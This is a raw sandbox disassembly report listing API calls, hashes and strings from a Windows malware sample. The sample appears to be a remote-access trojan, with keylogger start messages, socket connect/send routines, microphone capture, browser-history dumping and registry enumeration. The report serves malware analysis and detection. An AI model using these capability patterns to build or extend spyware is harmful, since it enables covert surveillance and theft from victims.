                                                  • Snapshot File: hcaresult_0_2_20f0000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: _free$ErrorFreeHeapLast
                                                  • String ID:
                                                  • API String ID: 776569668-0
                                                  • Opcode ID: 24d082c4c32556380d94a426a0797d769337f58152c77e2724906da83e703e03
                                                  • Instruction ID: 6e014a7b4167ae35947e7e856bc2992a6dcae5b52f18cf5efb082bab32e09220
                                                  • Opcode Fuzzy Hash: 24d082c4c32556380d94a426a0797d769337f58152c77e2724906da83e703e03
                                                  • Instruction Fuzzy Hash: EBF01232985244BF8662DB65E885C1677EFEA017347945819F048D7960C733FCC1CA58
                                                  APIs
                                                  • GetWindowThreadProcessId.USER32(?,?), ref: 00416768
                                                  • GetWindowTextW.USER32(?,?,0000012C), ref: 0041679A
                                                  • IsWindowVisible.USER32(?), ref: 004167A1
                                                    • Part of subcall function 0041B37D: OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 0041B395
                                                    • Part of subcall function 0041B37D: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 0041B3A8
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2294667849.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2294667849.0000000000473000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2294667849.0000000000476000.00000040.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ProcessWindow$Open$TextThreadVisible
                                                  • String ID: (FG
                                                  • API String ID: 3142014140-2273637114
                                                  • Opcode ID: c7140c968b57e192add68dc6676992042de4a480ef872d90ee77a690e46fad53
                                                  • Instruction ID: 6337817d5adb2ff800b6fe7f9081d1b6a06097940366009b721c4d78a1625a25
                                                  • Opcode Fuzzy Hash: c7140c968b57e192add68dc6676992042de4a480ef872d90ee77a690e46fad53
                                                  • Instruction Fuzzy Hash: FD71E6321082414AC325FB61D8A5ADFB3E4AFE4319F50453EF58A530E1EF746A49C79A
                                                  APIs
                                                  • GetWindowThreadProcessId.USER32(?,?), ref: 021069CF
                                                  • GetWindowTextW.USER32(?,?,0000012C), ref: 02106A01
                                                  • IsWindowVisible.USER32(?), ref: 02106A08
                                                    • Part of subcall function 0210B5E4: OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 0210B5FC
                                                    • Part of subcall function 0210B5E4: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 0210B60F
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2295418897.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_20f0000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ProcessWindow$Open$TextThreadVisible
                                                  • String ID: (FG
                                                  • API String ID: 3142014140-2273637114
                                                  • Opcode ID: c7140c968b57e192add68dc6676992042de4a480ef872d90ee77a690e46fad53
                                                  • Instruction ID: 0da89d10a6b4933584687107be04c8954425e71be0d5aeee896dedc0bbe960fc
                                                  • Opcode Fuzzy Hash: c7140c968b57e192add68dc6676992042de4a480ef872d90ee77a690e46fad53
                                                  • Instruction Fuzzy Hash: 4D7108721883414ED3A5FB20D8A0EEF73A6FFE4300F50456DDA8A42594EF346A49DF56
                                                  APIs
                                                  • RegQueryInfoKeyW.ADVAPI32(?,?,?,00000000,?,?,?,?,?,?,?,?), ref: 02102C84
                                                  • RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,?,?,?,?,00000000,?,?,?,?), ref: 02102CB3
                                                  • RegEnumValueW.ADVAPI32(?,00000000,?,?,00000000,?,?,00002710,?,?,?,00000000,?,?,?,?), ref: 02102D54
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2295418897.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_20f0000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Enum$InfoQueryValue
                                                  • String ID: DG
                                                  • API String ID: 3554306468-2560412334
                                                  • Opcode ID: bddf4943656ecba2bd9c39908ecfff909f44732c8dc369bfccc853cd4406e952
                                                  • Instruction ID: 2d567e05e56efbea3f7271a897860ecf4582f7bbff176a4b7b9f8041b7da76cd
                                                  • Opcode Fuzzy Hash: bddf4943656ecba2bd9c39908ecfff909f44732c8dc369bfccc853cd4406e952
                                                  • Instruction Fuzzy Hash: 48512072148344AFD350EB60DC84EEBB3EDFF94700F00492EBA9592550EB74EA09CB66
                                                  APIs
                                                  • _strpbrk.LIBCMT ref: 0044D4A8
                                                  • _free.LIBCMT ref: 0044D5C5
                                                    • Part of subcall function 0043A854: IsProcessorFeaturePresent.KERNEL32(00000017,0043A826,?,?,00401962,?,?,00000000,?,?,0043A846,00000000,00000000,00000000,00000000,00000000), ref: 0043A856
                                                    • Part of subcall function 0043A854: GetCurrentProcess.KERNEL32(C0000417), ref: 0043A878
                                                    • Part of subcall function 0043A854: TerminateProcess.KERNEL32(00000000), ref: 0043A87F
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2294667849.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2294667849.0000000000473000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2294667849.0000000000476000.00000040.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Process$CurrentFeaturePresentProcessorTerminate_free_strpbrk
                                                  • String ID: *?$.
                                                  • API String ID: 2812119850-3972193922
                                                  • Opcode ID: 5e5281a7710df1af016e28c269081ecff319cf0b763ae5275be817dad69de84b
                                                  • Instruction ID: 2d4433a3afc190a5690657b280c6536bac4d5ba0d1806d6c31be7b1549e3be36
                                                  • Opcode Fuzzy Hash: 5e5281a7710df1af016e28c269081ecff319cf0b763ae5275be817dad69de84b
                                                  • Instruction Fuzzy Hash: 7251B371E00109AFEF14DFA9C881AAEB7F5EF58318F24416FE854E7301DA799E018B54
                                                  APIs
                                                  • _strpbrk.LIBCMT ref: 0213D70F
                                                  • _free.LIBCMT ref: 0213D82C
                                                    • Part of subcall function 0212AABB: IsProcessorFeaturePresent.KERNEL32(00000017,0212AA8D,?,?,020F1BC9,?,?,00000000,?,?,0212AAAD,00000000,00000000,00000000,00000000,00000000), ref: 0212AABD
                                                    • Part of subcall function 0212AABB: GetCurrentProcess.KERNEL32(C0000417), ref: 0212AADF
                                                    • Part of subcall function 0212AABB: TerminateProcess.KERNEL32(00000000), ref: 0212AAE6
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2295418897.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_20f0000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Process$CurrentFeaturePresentProcessorTerminate_free_strpbrk
                                                  • String ID: *?$.
                                                  • API String ID: 2812119850-3972193922
                                                  • Opcode ID: 5e5281a7710df1af016e28c269081ecff319cf0b763ae5275be817dad69de84b
                                                  • Instruction ID: 40a78cae5b800a90d187e86258638994add200799e8bb882a05aa4fa567d3d75
                                                  • Opcode Fuzzy Hash: 5e5281a7710df1af016e28c269081ecff319cf0b763ae5275be817dad69de84b
                                                  • Instruction Fuzzy Hash: 7E519076E40219EFDF15DFA8D880AADBBB6EF48314F248169E854E7340E731AA01CF50
                                                  APIs
                                                  • GetKeyboardLayoutNameA.USER32(?), ref: 00409601
                                                    • Part of subcall function 004041F1: socket.WS2_32(?,00000001,00000006), ref: 00404212
                                                    • Part of subcall function 0040428C: connect.WS2_32(?,?,?), ref: 004042A5
                                                    • Part of subcall function 0041B6AA: CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000,?,00000000,00409689,00473EE8,?,00473EE8,00000000,00473EE8,00000000), ref: 0041B6BF
                                                    • Part of subcall function 00404468: send.WS2_32(?,00000000,00000000,00000000), ref: 004044FD
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2294667849.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2294667849.0000000000473000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2294667849.0000000000476000.00000040.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CreateFileKeyboardLayoutNameconnectsendsocket
                                                  • String ID: XCG$`AG$>G
                                                  • API String ID: 2334542088-2372832151
                                                  • Opcode ID: 57430c91427567827473bab5627dcff1f7b98a8ead265141081511e002c0e5a5
                                                  • Instruction ID: 7adbea44916697806613a62f0197ef330eb15d5bc584e2d7fa9685cab7613629
                                                  • Opcode Fuzzy Hash: 57430c91427567827473bab5627dcff1f7b98a8ead265141081511e002c0e5a5
                                                  • Instruction Fuzzy Hash: 865143321042405BC325F775D8A2AEF73D5AFE4308F50483FF84A671E2EE785949C69A
                                                  APIs
                                                  • GetKeyboardLayoutNameA.USER32(?), ref: 020F9868
                                                    • Part of subcall function 020F4458: socket.WS2_32(00000000,00000001,00000006), ref: 020F4479
                                                    • Part of subcall function 020F44F3: connect.WS2_32(?,00000000,00000000), ref: 020F450C
                                                    • Part of subcall function 0210B911: CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000,?,00000000,020F98F0,00473EE8,?,00473EE8,00000000,00473EE8,00000000), ref: 0210B926
                                                    • Part of subcall function 020F46CF: send.WS2_32(?,00000000,00000000,00000000), ref: 020F4764
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2295418897.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_20f0000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CreateFileKeyboardLayoutNameconnectsendsocket
                                                  • String ID: XCG$`AG$>G
                                                  • API String ID: 2334542088-2372832151
                                                  • Opcode ID: 57430c91427567827473bab5627dcff1f7b98a8ead265141081511e002c0e5a5
                                                  • Instruction ID: 66e347c5456f9a77f6dbed42a7107cccd1e393b4c525f7e1c372ebab81aa41fb
                                                  • Opcode Fuzzy Hash: 57430c91427567827473bab5627dcff1f7b98a8ead265141081511e002c0e5a5
                                                  • Instruction Fuzzy Hash: 9E5123312883405FD3A9F724D860AEF7396AFE4300F50492DDB4A47594EF345E4ADE55
                                                  APIs
                                                  • connect.WS2_32(?,00000000,00000000), ref: 020F450C
                                                  • WSAGetLastError.WS2_32(?,?,?,020F1B92), ref: 020F464E
                                                    • Part of subcall function 0210A8ED: GetLocalTime.KERNEL32(00000000), ref: 0210A907
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2295418897.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_20f0000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ErrorLastLocalTimeconnect
                                                  • String ID: Connection Failed: $TLS Handshake... |
                                                  • API String ID: 227477821-1510355367
                                                  • Opcode ID: 62f3c4882b49c5ff5d63aa71430f88bee7d31ae11dd357ee521aebef95a1510e
                                                  • Instruction ID: 6d1249e49701d63c0008f14d4d99167024abe107503d6004743562d05d12d1e3
                                                  • Opcode Fuzzy Hash: 62f3c4882b49c5ff5d63aa71430f88bee7d31ae11dd357ee521aebef95a1510e
                                                  • Instruction Fuzzy Hash: 01415670BC0701BF8A85B7BC8C466AE7A97BB41340B40016ADF0143E91FF5198649FEB
                                                  APIs
                                                  • ShellExecuteW.SHELL32(00000000,0046559C,0046BA00,00000000,00000000,00000000), ref: 021068C3
                                                    • Part of subcall function 0210B881: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,00000000,?,?,00000000,020F3D5A,00465324), ref: 0210B89A
                                                  • Sleep.KERNEL32(00000064), ref: 021068EF
                                                  • DeleteFileW.KERNEL32(00000000), ref: 02106923
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2295418897.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_20f0000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: File$CreateDeleteExecuteShellSleep
                                                  • String ID: /t
                                                  • API String ID: 1462127192-3161277685
                                                  • Opcode ID: bb2c0f94cc430c17f8d99c3ea8886f75899e052070629971ff6dc793af8fbd9b
                                                  • Instruction ID: c0241350ab6d9c011de7eff46a26bb2aa3feff10e5e755c52f3fc4b9ee172391
                                                  • Opcode Fuzzy Hash: bb2c0f94cc430c17f8d99c3ea8886f75899e052070629971ff6dc793af8fbd9b
                                                  • Instruction Fuzzy Hash: 553194319803089EDB98FB60DC91EEE773AEF10304F004065EB06678D4EF646A8ADE95
                                                  APIs
                                                  • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00403A2A
                                                    • Part of subcall function 0041AB38: GetCurrentProcessId.KERNEL32(00000000,?,?,?,?,?,?,00403A40), ref: 0041AB5F
                                                    • Part of subcall function 004176B6: CloseHandle.KERNEL32(00403AB9,?,?,00403AB9,00465324), ref: 004176CC
                                                    • Part of subcall function 004176B6: CloseHandle.KERNEL32($SF,?,?,00403AB9,00465324), ref: 004176D5
                                                    • Part of subcall function 0041B61A: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,00000000,?,?,00000000,00403AF3,00465324), ref: 0041B633
                                                  • Sleep.KERNEL32(000000FA,00465324), ref: 00403AFC
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2294667849.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                   • Associated: 00000000.00000002.2294667849.0000000000473000.00000040.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.2294667849.0000000000476000.00000040.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CloseFileHandle$CreateCurrentModuleNameProcessSleep
                                                  • String ID: /sort "Visit Time" /stext "$8>G
                                                  • API String ID: 368326130-2663660666
                                                  • Opcode ID: 990f793d9491b182eef5782c80c469aeda964fb7442a3231b80520572f45cea7
                                                  • Instruction ID: 7eda923cdb9144c2d3fbd791e6ccfb72172be11f11f2a08a3aebfaec1b2861d2
                                                  • Opcode Fuzzy Hash: 990f793d9491b182eef5782c80c469aeda964fb7442a3231b80520572f45cea7
                                                  • Instruction Fuzzy Hash: E5317331A0021456CB14FBB6DC969EE7775AF90318F40017FF906B71D2EF385A8ACA99
                                                  APIs
                                                  • CreateThread.KERNEL32(00000000,00000000,004099A9,004740F8,00000000,00000000), ref: 0040992A
                                                  • CreateThread.KERNEL32(00000000,00000000,00409993,004740F8,00000000,00000000), ref: 0040993A
                                                  • CreateThread.KERNEL32(00000000,00000000,004099B5,004740F8,00000000,00000000), ref: 00409946
                                                    • Part of subcall function 0040A876: GetLocalTime.KERNEL32(?,Offline Keylogger Started,004740F8), ref: 0040A884
                                                    • Part of subcall function 0040A876: wsprintfW.USER32 ref: 0040A905
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2294667849.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                   • Associated: 00000000.00000002.2294667849.0000000000473000.00000040.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.2294667849.0000000000476000.00000040.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CreateThread$LocalTimewsprintf
                                                  • String ID: Offline Keylogger Started
                                                  • API String ID: 465354869-4114347211
                                                  • Opcode ID: e4b3cc794dd4dc82af17be615720d717cdc228e4dcc969415cabf8effd0a7ef5
                                                  • Instruction ID: 73cd13916ef890eca76c0e29a3751801184202c96e3ca0ae9416a03768ca9078
                                                  • Opcode Fuzzy Hash: e4b3cc794dd4dc82af17be615720d717cdc228e4dcc969415cabf8effd0a7ef5
                                                  • Instruction Fuzzy Hash: CF11ABB15003097AD220BA36DC87CBF765CDA813A8B40053EF845225D3EA785E54C6FB
                                                  APIs
                                                  • GetLocalTime.KERNEL32(?,Offline Keylogger Started,004740F8), ref: 020FAAEB
                                                  • wsprintfW.USER32 ref: 020FAB6C
                                                    • Part of subcall function 020F9FBF: SetEvent.KERNEL32(00000000,?,00000000,020FAB83,00000000), ref: 020F9FEB
                                                  Strings
                                                  • [%04i/%02i/%02i %02i:%02i:%02i , xrefs: 020FAAF4
                                                  • Offline Keylogger Started, xrefs: 020FAAE4
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2295418897.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_20f0000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: EventLocalTimewsprintf
                                                  • String ID: [%04i/%02i/%02i %02i:%02i:%02i $Offline Keylogger Started
                                                  • API String ID: 1497725170-184404310
                                                  • Opcode ID: d5ceb195e9b1766e7296a956330388e17a452e3f282c8842e463cd6a29e782c0
                                                  • Instruction ID: 6d6634266dd584deb4a8824bcd29f3af10f901af6c22c43107ce0842f30fbbd6
                                                  • Opcode Fuzzy Hash: d5ceb195e9b1766e7296a956330388e17a452e3f282c8842e463cd6a29e782c0
                                                  • Instruction Fuzzy Hash: 0711B673444218BECB58FB54EC50CFE77BEEE48311B00002AF90256584FF78AA85DAA4
                                                  APIs
                                                    • Part of subcall function 0040A876: GetLocalTime.KERNEL32(?,Offline Keylogger Started,004740F8), ref: 0040A884
                                                    • Part of subcall function 0040A876: wsprintfW.USER32 ref: 0040A905
                                                    • Part of subcall function 0041A686: GetLocalTime.KERNEL32(00000000), ref: 0041A6A0
                                                  • CreateThread.KERNEL32(00000000,00000000,00409993,?,00000000,00000000), ref: 0040A691
                                                  • CreateThread.KERNEL32(00000000,00000000,004099B5,?,00000000,00000000), ref: 0040A69D
                                                  • CreateThread.KERNEL32(00000000,00000000,004099C1,?,00000000,00000000), ref: 0040A6A9
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2294667849.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                   • Associated: 00000000.00000002.2294667849.0000000000473000.00000040.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.2294667849.0000000000476000.00000040.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CreateThread$LocalTime$wsprintf
                                                  • String ID: Online Keylogger Started
                                                  • API String ID: 112202259-1258561607
                                                  • Opcode ID: 1ea656b2c3fb8bac4f5f56c22ee55bbacf92cc14a274965a5590b27fc2444f83
                                                  • Instruction ID: 3917ec9fcb61ff418b23047d8298326e5ff7fd14d64f683336ff9c65b5464130
                                                  • Opcode Fuzzy Hash: 1ea656b2c3fb8bac4f5f56c22ee55bbacf92cc14a274965a5590b27fc2444f83
                                                  • Instruction Fuzzy Hash: DE01C4916003093AE62076368C87DBF3A6DCA813A8F40043EF541362C3E97D5D5582FB
                                                  APIs
                                                  • CloseHandle.KERNEL32(00000000,00000000,`@,?,0044A991,`@,0046DD28,0000000C), ref: 0044AAC9
                                                  • GetLastError.KERNEL32(?,0044A991,`@,0046DD28,0000000C), ref: 0044AAD3
                                                  • __dosmaperr.LIBCMT ref: 0044AAFE
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2294667849.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                   • Associated: 00000000.00000002.2294667849.0000000000473000.00000040.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.2294667849.0000000000476000.00000040.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CloseErrorHandleLast__dosmaperr
                                                  • String ID: `@
                                                  • API String ID: 2583163307-951712118
                                                  • Opcode ID: e5cf9cf0863519c22c59f520a66439faf8bffb0939932f5db486048d3d382d3d
                                                  • Instruction ID: 1bd3c876d7044edfb1a6812000b34c32b622226010ed5631802de8abdb52b33d
                                                  • Opcode Fuzzy Hash: e5cf9cf0863519c22c59f520a66439faf8bffb0939932f5db486048d3d382d3d
                                                  • Instruction Fuzzy Hash: F8018E366446201AF7206674698577F77898B82738F2A027FF904972D2DE6DCCC5C19F
                                                  APIs
                                                  • GetLocalTime.KERNEL32(?), ref: 00404946
                                                  • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00404994
                                                  • CreateThread.KERNEL32(00000000,00000000,00404B1D,?,00000000,00000000), ref: 004049A7
                                                  Strings
                                                  • KeepAlive | Enabled | Timeout: , xrefs: 0040495C
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2294667849.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                   • Associated: 00000000.00000002.2294667849.0000000000473000.00000040.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.2294667849.0000000000476000.00000040.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Create$EventLocalThreadTime
                                                  • String ID: KeepAlive | Enabled | Timeout:
                                                  • API String ID: 2532271599-1507639952
                                                  • Opcode ID: 34c26403a1d925ecd11954548bb519a5dc401319f2b3b545c2e0a368bcefaf88
                                                  • Instruction ID: c7daaf492e0cec12b0841424890a61be8e5b61f5a3177df3d8f4b9063cedc03f
                                                  • Opcode Fuzzy Hash: 34c26403a1d925ecd11954548bb519a5dc401319f2b3b545c2e0a368bcefaf88
                                                  • Instruction Fuzzy Hash: 38113AB19042547AC710A7BA8C49BCB7F9C9F86364F00407BF40462192C7789845CBFA
                                                  APIs
                                                  • GetLocalTime.KERNEL32(?), ref: 020F4BAD
                                                  • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 020F4BFB
                                                  • CreateThread.KERNEL32(00000000,00000000,00404B1D,?,00000000,00000000), ref: 020F4C0E
                                                  Strings
                                                  • KeepAlive | Enabled | Timeout: , xrefs: 020F4BC3
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2295418897.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_20f0000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Create$EventLocalThreadTime
                                                  • String ID: KeepAlive | Enabled | Timeout:
                                                  • API String ID: 2532271599-1507639952
                                                  • Opcode ID: 039a83a3673151248ce1c058b5ed99207d7e0ff837a33c13ebd59ef1524b6346
                                                  • Instruction ID: 33efbf68f6339bf734b1188f846aaae02ee7652e6743bb32509fb17bb5487265
                                                  • Opcode Fuzzy Hash: 039a83a3673151248ce1c058b5ed99207d7e0ff837a33c13ebd59ef1524b6346
                                                  • Instruction Fuzzy Hash: A7112071A443643BC751AB7A8808BCF7FA8AF86360F000066EA0942582DBB49085DBF6
                                                  APIs
                                                    • Part of subcall function 0210B3C2: GetCurrentProcess.KERNEL32(00000003,?,?,0210A6D8,00000000,00474358,00000003,0046662C,00000000,0000000E,00000000,0046556C,00000003,00000000), ref: 0210B3D3
                                                    • Part of subcall function 0210B3C2: IsWow64Process.KERNEL32(00000000,?,?,0210A6D8,00000000,00474358,00000003,0046662C,00000000,0000000E,00000000,0046556C,00000003,00000000), ref: 0210B3DA
                                                    • Part of subcall function 0210277A: RegOpenKeyExA.ADVAPI32(80000001,00000400,00000000,00020019,?), ref: 0210279E
                                                    • Part of subcall function 0210277A: RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,00000400), ref: 021027BB
                                                    • Part of subcall function 0210277A: RegCloseKey.ADVAPI32(?), ref: 021027C6
                                                  • StrToIntA.SHLWAPI(00000000,0046BC48,?,00000000,00000000,00474358,00000003,0046662C,00000000,0000000E,00000000,0046556C,00000003,00000000), ref: 0210A740
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2295418897.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_20f0000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Process$CloseCurrentOpenQueryValueWow64
                                                  • String ID: (32 bit)$ (64 bit)$SOFTWARE\Microsoft\Windows NT\CurrentVersion
                                                  • API String ID: 782494840-214125106
                                                  • Opcode ID: 6ae090941000325c3c897e8fa024b5b50426e295cbf2c4f387652279544f3053
                                                  • Instruction ID: bfd271c5cafd32a8c3ed1538965b58b59d43eff98009d0ad5c005b8e6d4ba07a
                                                  • Opcode Fuzzy Hash: 6ae090941000325c3c897e8fa024b5b50426e295cbf2c4f387652279544f3053
                                                  • Instruction Fuzzy Hash: 4B115960A803012ED704B374DC8BEAF366BDB90300F544539AA01931C1EBA49E469BE9
                                                  APIs
                                                  • WaitForSingleObject.KERNEL32(?,000003E8,?,?,?,00404B26), ref: 00404B40
                                                  • CloseHandle.KERNEL32(?,?,?,?,00404B26), ref: 00404B98
                                                  • SetEvent.KERNEL32(?,?,?,?,00404B26), ref: 00404BA7
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2294667849.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                   • Associated: 00000000.00000002.2294667849.0000000000473000.00000040.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.2294667849.0000000000476000.00000040.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CloseEventHandleObjectSingleWait
                                                  • String ID: Connection Timeout
                                                  • API String ID: 2055531096-499159329
                                                  • Opcode ID: 5b19e5ba9062c404f279f3250fb80d0aa27bbf62a4bae84bdb253fcab457f044
                                                  • Instruction ID: ea4abd021a31a941d528121f8d879e106695b0b6a7a7fd2d86c7f06b9a048df4
                                                  • Opcode Fuzzy Hash: 5b19e5ba9062c404f279f3250fb80d0aa27bbf62a4bae84bdb253fcab457f044
                                                  • Instruction Fuzzy Hash: 7A01F5B1940B41AFD325BB3A9C4645ABBE4AB45315700053FF6D392BB1DA38E8408B5A
                                                  APIs
                                                  • waveInPrepareHeader.WINMM(005A2560,00000020,?,?,00000000,00475B70,00473EE8,?,00000000,00401913), ref: 00401747
                                                  • waveInAddBuffer.WINMM(005A2560,00000020,?,00000000,00401913), ref: 0040175D
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2294667849.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                   • Associated: 00000000.00000002.2294667849.0000000000473000.00000040.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.2294667849.0000000000476000.00000040.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: wave$BufferHeaderPrepare
                                                  • String ID: T=G$`%Z
                                                  • API String ID: 2315374483-470489524
                                                  • Opcode ID: 0ff4070462d876ba9a0314f854ca9e5b2f4718fb39603aa566027c6b2d74496f
                                                  • Instruction ID: f8644d152c35c587af506687758c025c54344a6e575747702fe1289d7b8da532
                                                  • Opcode Fuzzy Hash: 0ff4070462d876ba9a0314f854ca9e5b2f4718fb39603aa566027c6b2d74496f
                                                  • Instruction Fuzzy Hash: 65018B71301300AFD7209F39EC45A69BBA9EB4931AF01413EB808D32B1EB34A8509B98
                                                  APIs
                                                  • waveInPrepareHeader.WINMM(`%Z,00000020,00475BF4,00475BF4,00000000,00475B70,00473EE8,?,00000000,020F1B7A), ref: 020F19AE
